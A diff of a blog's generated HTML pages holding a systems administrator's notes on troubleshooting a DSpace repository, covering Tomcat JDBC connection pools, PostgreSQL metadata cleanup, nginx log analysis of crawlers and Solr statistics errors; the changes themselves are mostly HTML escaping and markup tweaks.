2017-12-19 13:26:54,306 INFO org.flywaydb.core.internal.dbsupport.DbSupportFactory @ Database: jdbc:postgresql://localhost:5432/dspacetest (PostgreSQL 9.5)
</code></pre><ul>
@ -580,7 +580,7 @@ javax.naming.NameNotFoundException: Name [jdbc/dspace] is not bound in this Cont
</li>
<li>After adding the <code>Resource</code> to <em>server.xml</em> on Ubuntu I get this in Catalina&rsquo;s logs:</li>
</ul>
<pre><code>SEVERE: Unable to create initial connections of pool.
<pre tabindex="0"><code>SEVERE: Unable to create initial connections of pool.
java.sql.SQLException: org.postgresql.Driver
...
Caused by: java.lang.ClassNotFoundException: org.postgresql.Driver
@ -589,17 +589,17 @@ Caused by: java.lang.ClassNotFoundException: org.postgresql.Driver
<li>I tried installing Ubuntu&rsquo;s <code>libpostgresql-jdbc-java</code> package but Tomcat still can&rsquo;t find the class</li>
<li>Let me try to symlink the lib into Tomcat&rsquo;s libs:</li>
</ul>
<pre><code># ln -sv /usr/share/java/postgresql.jar /usr/share/tomcat7/lib
<pre tabindex="0"><code># ln -sv /usr/share/java/postgresql.jar /usr/share/tomcat7/lib
</code></pre><ul>
<li>Now Tomcat starts but the localhost container has errors:</li>
</ul>
<pre><code>SEVERE: Exception sending context initialized event to listener instance of class org.dspace.app.util.DSpaceContextListener
<pre tabindex="0"><code>SEVERE: Exception sending context initialized event to listener instance of class org.dspace.app.util.DSpaceContextListener
java.lang.AbstractMethodError: Method org/postgresql/jdbc3/Jdbc3ResultSet.isClosed()Z is abstract
</code></pre><ul>
<li>Could be a version issue or something since the Ubuntu package provides 9.2 and DSpace&rsquo;s are 9.1&hellip;</li>
<li>Let me try to remove it and copy in DSpace&rsquo;s:</li>
</ul>
<pre><code># rm /usr/share/tomcat7/lib/postgresql.jar
<pre tabindex="0"><code># rm /usr/share/tomcat7/lib/postgresql.jar
# cp [dspace]/webapps/xmlui/WEB-INF/lib/postgresql-9.1-901-1.jdbc4.jar /usr/share/tomcat7/lib/
</code></pre><ul>
<li>Wow, I think that actually works&hellip;</li>
@ -608,12 +608,12 @@ java.lang.AbstractMethodError: Method org/postgresql/jdbc3/Jdbc3ResultSet.isClos
<li>Also, since I commented out all the db parameters in DSpace.cfg, how does the command line <code>dspace</code> tool work?</li>
<li>Let&rsquo;s try the upstream JDBC driver first:</li>
</ul>
<pre><code># rm /usr/share/tomcat7/lib/postgresql-9.1-901-1.jdbc4.jar
<pre tabindex="0"><code># rm /usr/share/tomcat7/lib/postgresql-9.1-901-1.jdbc4.jar
# wget https://jdbc.postgresql.org/download/postgresql-42.1.4.jar -O /usr/share/tomcat7/lib/postgresql-42.1.4.jar
</code></pre><ul>
<li>DSpace command line fails unless db settings are present in dspace.cfg:</li>
</ul>
<pre><code>$ dspace database info
<pre tabindex="0"><code>$ dspace database info
Caught exception:
java.sql.SQLException: java.lang.ClassNotFoundException:
at org.dspace.storage.rdbms.DataSourceInit.getDatasource(DataSourceInit.java:171)
@ -633,7 +633,7 @@ Caused by: java.lang.ClassNotFoundException:
</code></pre><ul>
<li>And in the logs:</li>
</ul>
<pre><code>2017-12-19 18:26:56,971 ERROR org.dspace.storage.rdbms.DatabaseManager @ Error retrieving JNDI context: jdbc/dspace
<pre tabindex="0"><code>2017-12-19 18:26:56,971 ERROR org.dspace.storage.rdbms.DatabaseManager @ Error retrieving JNDI context: jdbc/dspace
javax.naming.NoInitialContextException: Need to specify class name in environment or system property, or as an applet parameter, or in an application resource file: java.naming.factory.initial
at javax.naming.spi.NamingManager.getInitialContext(NamingManager.java:662)
at javax.naming.InitialContext.getDefaultInitCtx(InitialContext.java:313)
@ -669,7 +669,7 @@ javax.naming.NoInitialContextException: Need to specify class name in environmen
<li>There are short bursts of connections up to 10, but it generally stays around 5</li>
<li>Test and import 13 records to CGSpace for Abenet:</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ dspace import -a -e aorth@mjanja.ch -s /home/aorth/cg_system_20Dec/SimpleArchiveFormat -m systemoffice.map &amp;&gt; systemoffice.log
</code></pre><ul>
<li>The fucking database went from 47 to 72 to 121 connections while I was importing so it stalled.</li>
@ -677,7 +677,7 @@ $ dspace import -a -e aorth@mjanja.ch -s /home/aorth/cg_system_20Dec/SimpleArchi
<li>There was an initial connection storm of 50 PostgreSQL connections, but then it settled down to 7</li>
<li>After that CGSpace came up fine and I was able to import the 13 items just fine:</li>
</ul>
<pre><code>$ dspace import -a -e aorth@mjanja.ch -s /home/aorth/cg_system_20Dec/SimpleArchiveFormat -m systemoffice.map &amp;&gt; systemoffice.log
<pre tabindex="0"><code>$ dspace import -a -e aorth@mjanja.ch -s /home/aorth/cg_system_20Dec/SimpleArchiveFormat -m systemoffice.map &amp;&gt; systemoffice.log
$ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -i 10568/89287
</code></pre><ul>
<li>The final code for the JNDI work in the Ansible infrastructure scripts is here: <a href="https://github.com/ilri/rmg-ansible-public/commit/1959d9cb7a0e7a7318c77f769253e5e029bdfa3b">https://github.com/ilri/rmg-ansible-public/commit/1959d9cb7a0e7a7318c77f769253e5e029bdfa3b</a></li>
@ -687,7 +687,7 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -i 10568/89287
<li>Linode alerted that CGSpace was using high CPU this morning around 6 AM</li>
<li>I&rsquo;m playing with reading all of a month&rsquo;s nginx logs into goaccess:</li>
</ul>
<pre><code># find /var/log/nginx -type f -newermt &quot;2017-12-01&quot; | xargs zcat --force | goaccess --log-format=COMBINED -
<pre tabindex="0"><code># find /var/log/nginx -type f -newermt &#34;2017-12-01&#34; | xargs zcat --force | goaccess --log-format=COMBINED -
</code></pre><ul>
<li>I can see interesting things using this approach, for example:
<ul>
@ -708,23 +708,23 @@ $ schedtool -D -e ionice -c2 -n7 nice -n19 dspace filter-media -i 10568/89287
<ul>
<li>Looking at some old notes for metadata to clean up, I found a few hundred corrections in <code>cg.fulltextstatus</code> and <code>dc.language.iso</code>:</li>
</ul>
<pre><code># update metadatavalue set text_value='Formally Published' where resource_type_id=2 and metadata_field_id=214 and text_value like 'Formally published';
<pre tabindex="0"><code># update metadatavalue set text_value=&#39;Formally Published&#39; where resource_type_id=2 and metadata_field_id=214 and text_value like &#39;Formally published&#39;;
UPDATE 5
# delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like 'NO';
# delete from metadatavalue where resource_type_id=2 and metadata_field_id=214 and text_value like &#39;NO&#39;;
DELETE 17
# update metadatavalue set text_value='en' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(En|English)';
# update metadatavalue set text_value=&#39;en&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(En|English)&#39;;
UPDATE 49
# update metadatavalue set text_value='fr' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(fre|frn|French)';
# update metadatavalue set text_value=&#39;fr&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(fre|frn|French)&#39;;
UPDATE 4
# update metadatavalue set text_value='es' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(Spanish|spa)';
# update metadatavalue set text_value=&#39;es&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(Spanish|spa)&#39;;
UPDATE 16
# update metadatavalue set text_value='vi' where resource_type_id=2 and metadata_field_id=38 and text_value='Vietnamese';
# update metadatavalue set text_value=&#39;vi&#39; where resource_type_id=2 and metadata_field_id=38 and text_value=&#39;Vietnamese&#39;;
UPDATE 9
# update metadatavalue set text_value='ru' where resource_type_id=2 and metadata_field_id=38 and text_value='Ru';
# update metadatavalue set text_value=&#39;ru&#39; where resource_type_id=2 and metadata_field_id=38 and text_value=&#39;Ru&#39;;
UPDATE 1
# update metadatavalue set text_value='in' where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(IN|In)';
# update metadatavalue set text_value=&#39;in&#39; where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(IN|In)&#39;;
UPDATE 5
# delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ '(dc.language.iso|CGIAR Challenge Program on Water and Food)';
# delete from metadatavalue where resource_type_id=2 and metadata_field_id=38 and text_value ~ &#39;(dc.language.iso|CGIAR Challenge Program on Water and Food)&#39;;
DELETE 20
</code></pre><ul>
<li>I need to figure out why we have records with language <code>in</code> because that&rsquo;s not a language!</li>
@ -735,7 +735,7 @@ DELETE 20
<li>Uptime Robot noticed that the server went down for 1 minute a few hours later, around 9AM</li>
<li>Here&rsquo;s the XMLUI logs:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;30/Dec/2017&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;30/Dec/2017&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
637 207.46.13.106
641 157.55.39.186
715 68.180.229.254
@ -751,7 +751,7 @@ DELETE 20
<li>They identify as &ldquo;com.plumanalytics&rdquo;, which Google says is associated with Elsevier</li>
<li>They only seem to have used one Tomcat session so that&rsquo;s good, I guess I don&rsquo;t need to add them to the Tomcat Crawler Session Manager valve:</li>
</ul>
<pre><code>$ grep 54.175.208.220 dspace.log.2017-12-30 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 54.175.208.220 dspace.log.2017-12-30 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
1
</code></pre><ul>
<li>216.244.66.245 seems to be moz.com&rsquo;s DotBot</li>
@ -761,7 +761,7 @@ DELETE 20
<li>I finished working on the 42 records for CCAFS after Magdalena sent the remaining corrections</li>
<li>After that I uploaded them to CGSpace:</li>
</ul>
<pre><code>$ dspace import -a -e aorth@mjanja.ch -s /home/aorth/2016\ bulk\ upload\ thumbnails/SimpleArchiveFormat -m ccafs.map &amp;&gt; ccafs.log
<pre tabindex="0"><code>$ dspace import -a -e aorth@mjanja.ch -s /home/aorth/2016\ bulk\ upload\ thumbnails/SimpleArchiveFormat -m ccafs.map &amp;&gt; ccafs.log
</code></pre>
@ -783,15 +783,15 @@ DELETE 20
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -23,11 +23,11 @@ After that one client got an HTTP 499 but then the rest were HTTP 200, so I don&
I notice this error quite a few times in dspace.log:
2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976&#43;TO&#43;1979]&#39;: Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32.
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976&#43;TO&#43;1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
And there are many of these errors every day for the past month:
$ grep -c &quot;Error while searching for sidebar facets&quot; dspace.log.*
$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.*
dspace.log.2017-11-21:4
dspace.log.2017-11-22:1
dspace.log.2017-11-23:4
@ -99,11 +99,11 @@ After that one client got an HTTP 499 but then the rest were HTTP 200, so I don&
I notice this error quite a few times in dspace.log:
2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976&#43;TO&#43;1979]&#39;: Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32.
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976&#43;TO&#43;1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
And there are many of these errors every day for the past month:
$ grep -c &quot;Error while searching for sidebar facets&quot; dspace.log.*
$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.*
dspace.log.2017-11-21:4
dspace.log.2017-11-22:1
dspace.log.2017-11-23:4
@ -150,7 +150,7 @@ dspace.log.2018-01-02:34
Danny wrote to ask for help renewing the wildcard ilri.org certificate and I advised that we should probably use Let&rsquo;s Encrypt if it&rsquo;s just a handful of domains
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -180,12 +180,12 @@ Danny wrote to ask for help renewing the wildcard ilri.org certificate and I adv
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -231,7 +231,7 @@ Danny wrote to ask for help renewing the wildcard ilri.org certificate and I adv
<p class="blog-post-meta">
<time datetime="2018-01-02T08:35:54-08:00">Tue Jan 02, 2018</time>
in
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/categories/notes/" rel="category tag">Notes</a>
<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
</p>
@ -244,19 +244,19 @@ Danny wrote to ask for help renewing the wildcard ilri.org certificate and I adv
<li>In dspace.log around that time I see many errors like &ldquo;Client closed the connection before file download was complete&rdquo;</li>
<li>And just before that I see this:</li>
</ul>
<pre><code>Caused by: org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-980] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:50; busy:50; idle:0; lastwait:5000].
<pre tabindex="0"><code>Caused by: org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-980] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:50; busy:50; idle:0; lastwait:5000].
</code></pre><ul>
<li>Ah hah! So the pool was actually empty!</li>
<li>I need to increase that, let&rsquo;s try to bump it up from 50 to 75</li>
<li>After that one client got an HTTP 499 but then the rest were HTTP 200, so I don&rsquo;t know what the hell Uptime Robot saw</li>
<li>I notice this error quite a few times in dspace.log:</li>
</ul>
<pre><code>2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1976+TO+1979]': Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32.
<pre tabindex="0"><code>2018-01-02 01:21:19,137 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets
org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1976+TO+1979]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
</code></pre><ul>
<li>And there are many of these errors every day for the past month:</li>
</ul>
<pre><code>$ grep -c &quot;Error while searching for sidebar facets&quot; dspace.log.*
<pre tabindex="0"><code>$ grep -c &#34;Error while searching for sidebar facets&#34; dspace.log.*
dspace.log.2017-11-21:4
dspace.log.2017-11-22:1
dspace.log.2017-11-23:4
@ -308,7 +308,7 @@ dspace.log.2018-01-02:34
<li>I woke up to more up and down of CGSpace, this time UptimeRobot noticed a few rounds of up and down of a few minutes each and Linode also notified of high CPU load from 12 to 2 PM</li>
<li>Looks like I need to increase the database pool size again:</li>
</ul>
<pre><code>$ grep -c &quot;Timeout: Pool empty.&quot; dspace.log.2018-01-*
<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-*
dspace.log.2018-01-01:0
dspace.log.2018-01-02:1972
dspace.log.2018-01-03:1909
@ -319,7 +319,7 @@ dspace.log.2018-01-03:1909
<ul>
<li>The active IPs in XMLUI are:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;3/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;3/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
607 40.77.167.141
611 2a00:23c3:8c94:7800:392c:a491:e796:9c50
663 188.226.169.37
@ -336,12 +336,12 @@ dspace.log.2018-01-03:1909
<li>This appears to be the <a href="https://github.com/internetarchive/heritrix3">Internet Archive&rsquo;s open source bot</a></li>
<li>They seem to be re-using their Tomcat session so I don&rsquo;t need to do anything to them just yet:</li>
</ul>
<pre><code>$ grep 134.155.96.78 dspace.log.2018-01-03 | grep -o -E 'session_id=[A-Z0-9]{32}' | sort -n | uniq | wc -l
<pre tabindex="0"><code>$ grep 134.155.96.78 dspace.log.2018-01-03 | grep -o -E &#39;session_id=[A-Z0-9]{32}&#39; | sort -n | uniq | wc -l
2
</code></pre><ul>
<li>The API logs show the normal users:</li>
</ul>
<pre><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;3/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;3/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
32 207.46.13.182
38 40.77.167.132
38 68.180.229.254
@ -356,12 +356,12 @@ dspace.log.2018-01-03:1909
<li>In other related news I see a sizeable amount of requests coming from python-requests</li>
<li>For example, just in the last day there were 1700!</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -c python-requests
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -c python-requests
1773
</code></pre><ul>
<li>But they come from hundreds of IPs, many of which are 54.x.x.x:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep python-requests | awk '{print $1}' | sort -n | uniq -c | sort -h | tail -n 30
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep python-requests | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail -n 30
9 54.144.87.92
9 54.146.222.143
9 54.146.249.249
@ -402,7 +402,7 @@ dspace.log.2018-01-03:1909
<li>CGSpace went down and up a bunch of times last night and ILRI staff were complaining a lot last night</li>
<li>The XMLUI logs show this activity:</li>
</ul>
<pre><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &quot;4/Jan/2018&quot; | awk '{print $1}' | sort -n | uniq -c | sort -h | tail
<pre tabindex="0"><code># cat /var/log/nginx/access.log /var/log/nginx/access.log.1 /var/log/nginx/library-access.log /var/log/nginx/library-access.log.1 | grep -E &#34;4/Jan/2018&#34; | awk &#39;{print $1}&#39; | sort -n | uniq -c | sort -h | tail
968 197.211.63.81
981 213.55.99.121
1039 66.249.64.93
@ -416,12 +416,12 @@ dspace.log.2018-01-03:1909
</code></pre><ul>
<li>Again we ran out of PostgreSQL database connections, even after bumping the pool max active limit from 50 to 75 to 125 yesterday!</li>
</ul>
<pre><code>2018-01-04 07:36:08,089 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
<pre tabindex="0"><code>2018-01-04 07:36:08,089 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
org.apache.tomcat.jdbc.pool.PoolExhaustedException: [http-bio-127.0.0.1-8443-exec-256] Timeout: Pool empty. Unable to fetch a connection in 5 seconds, none available[size:125; busy:125; idle:0; lastwait:5000].
</code></pre><ul>
<li>So for this week that is the number one problem!</li>
</ul>
<pre><code>$ grep -c &quot;Timeout: Pool empty.&quot; dspace.log.2018-01-*
<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-*
dspace.log.2018-01-01:0
dspace.log.2018-01-02:1972
dspace.log.2018-01-03:1909
@ -436,7 +436,7 @@ dspace.log.2018-01-04:1559
<li>Peter said that CGSpace was down last night and Tsega restarted Tomcat</li>
<li>I don&rsquo;t see any alerts from Linode or UptimeRobot, and there are no PostgreSQL connection errors in the dspace logs for today:</li>
</ul>
<pre><code>$ grep -c &quot;Timeout: Pool empty.&quot; dspace.log.2018-01-*
<pre tabindex="0"><code>$ grep -c &#34;Timeout: Pool empty.&#34; dspace.log.2018-01-*
dspace.log.2018-01-01:0
dspace.log.2018-01-02:1972
dspace.log.2018-01-03:1909
@ -446,13 +446,13 @@ dspace.log.2018-01-05:0
<li>Daniel asked for help with their DAGRIS server (linode2328112) that has no disk space</li>
<li>I had a look and there is one Apache 2 log file that is 73GB, with lots of this:</li>
</ul>
<pre><code>[Fri Jan 05 09:31:22.965398 2018] [:error] [pid 9340] [client 213.55.99.121:64476] WARNING: Unable to find a match for &quot;9-16-1-RV.doc&quot; in &quot;/home/files/journals/6//articles/9/&quot;. Skipping this file., referer: http://dagris.info/reviewtool/index.php/index/install/upgrade
<pre tabindex="0"><code>[Fri Jan 05 09:31:22.965398 2018] [:error] [pid 9340] [client 213.55.99.121:64476] WARNING: Unable to find a match for &#34;9-16-1-RV.doc&#34; in &#34;/home/files/journals/6//articles/9/&#34;. Skipping this file., referer: http://dagris.info/reviewtool/index.php/index/install/upgrade
</code></pre><ul>
<li>I will delete the log file for now and tell Danny</li>
<li>Also, I&rsquo;m still seeing a hundred or so of the &ldquo;ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer&rdquo; errors in dspace logs, I need to search the dspace-tech mailing list to see what the cause is</li>
<li>I will run a full Discovery reindex in the mean time to see if it&rsquo;s something wrong with the Discovery Solr core</li>
</ul>
<pre><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx512m -XX:+TieredCompilation -XX:TieredStopAtLevel=1&#34;
$ time schedtool -D -e ionice -c2 -n7 nice -n19 [dspace]/bin/dspace index-discovery -b
real 110m43.985s
@ -465,7 +465,7 @@ sys 3m14.890s
<ul>
<li>I&rsquo;m still seeing Solr errors in the DSpace logs even after the full reindex yesterday:</li>
</ul>
<pre><code>org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse 'dateIssued_keyword:[1983+TO+1989]': Encountered &quot; &quot;]&quot; &quot;] &quot;&quot; at line 1, column 32.
<pre tabindex="0"><code>org.dspace.discovery.SearchServiceException: org.apache.solr.search.SyntaxError: Cannot parse &#39;dateIssued_keyword:[1983+TO+1989]&#39;: Encountered &#34; &#34;]&#34; &#34;] &#34;&#34; at line 1, column 32.
</code></pre><ul>
<li>I posted a message to the dspace-tech mailing list to see if anyone can help</li>
</ul>
@ -474,13 +474,13 @@ sys 3m14.890s
<li>Advise Sisay about blank lines in some IITA records</li>
<li>Generate a list of author affiliations for Peter to clean up:</li>
</ul>
<pre><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'affiliation') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;affiliation&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/affiliations.csv with csv;
COPY 4515
</code></pre><h2 id="2018-01-10">2018-01-10</h2>
<ul>
<li>I looked to see what happened to this year&rsquo;s Solr statistics sharding task that should have run on 2018-01-01 and of course it failed:</li>
</ul>
<pre><code>Moving: 81742 into core statistics-2010
<pre tabindex="0"><code>Moving: 81742 into core statistics-2010
Exception: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2010
org.apache.solr.client.solrj.SolrServerException: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2010
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:566)
@ -526,7 +526,7 @@ Caused by: java.net.SocketException: Connection reset
</code></pre><ul>
<li>DSpace Test has the same error but with creating the 2017 core:</li>
</ul>
<pre><code>Moving: 2243021 into core statistics-2017
<pre tabindex="0"><code>Moving: 2243021 into core statistics-2017
Exception: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2017
org.apache.solr.client.solrj.SolrServerException: IOException occured when talking to server at: http://localhost:8081/solr//statistics-2017
at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:566)
@ -553,27 +553,27 @@ Caused by: org.apache.http.client.ClientProtocolException
<li>I can apparently search for records in the Solr stats core that have an empty <code>owningColl</code> field using this in the Solr admin query: <code>-owningColl:*</code></li>
<li>On CGSpace I see 48,000,000 records that have an <code>owningColl</code> field and 34,000,000 that don&rsquo;t:</li>
</ul>
<pre><code>$ http 'http://localhost:3000/solr/statistics/select?q=owningColl%3A*&amp;wt=json&amp;indent=true' | grep numFound
&quot;response&quot;:{&quot;numFound&quot;:48476327,&quot;start&quot;:0,&quot;docs&quot;:[
$ http 'http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&amp;wt=json&amp;indent=true' | grep numFound
&quot;response&quot;:{&quot;numFound&quot;:34879872,&quot;start&quot;:0,&quot;docs&quot;:[
<pre tabindex="0"><code>$ http &#39;http://localhost:3000/solr/statistics/select?q=owningColl%3A*&amp;wt=json&amp;indent=true&#39; | grep numFound
&#34;response&#34;:{&#34;numFound&#34;:48476327,&#34;start&#34;:0,&#34;docs&#34;:[
$ http &#39;http://localhost:3000/solr/statistics/select?q=-owningColl%3A*&amp;wt=json&amp;indent=true&#39; | grep numFound
&#34;response&#34;:{&#34;numFound&#34;:34879872,&#34;start&#34;:0,&#34;docs&#34;:[
</code></pre><ul>
<li>I tested the <code>dspace stats-util -s</code> process on my local machine and it failed the same way</li>
<li>It doesn&rsquo;t seem to be helpful, but the dspace log shows this:</li>
</ul>
<pre><code>2018-01-10 10:51:19,301 INFO org.dspace.statistics.SolrLogger @ Created core with name: statistics-2016
<pre tabindex="0"><code>2018-01-10 10:51:19,301 INFO org.dspace.statistics.SolrLogger @ Created core with name: statistics-2016
2018-01-10 10:51:19,301 INFO org.dspace.statistics.SolrLogger @ Moving: 3821 records into core statistics-2016
</code></pre><ul>
<li>Terry Brady has written some notes on the DSpace Wiki about Solr sharing issues: <a href="https://wiki.lyrasis.org/display/%7Eterrywbrady/Statistics+Import+Export+Issues">https://wiki.lyrasis.org/display/%7Eterrywbrady/Statistics+Import+Export+Issues</a></li>
<li>Uptime Robot said that CGSpace went down at around 9:43 AM</li>
<li>I looked at PostgreSQL&rsquo;s <code>pg_stat_activity</code> table and saw 161 active connections, but no pool errors in the DSpace logs:</li>
</ul>
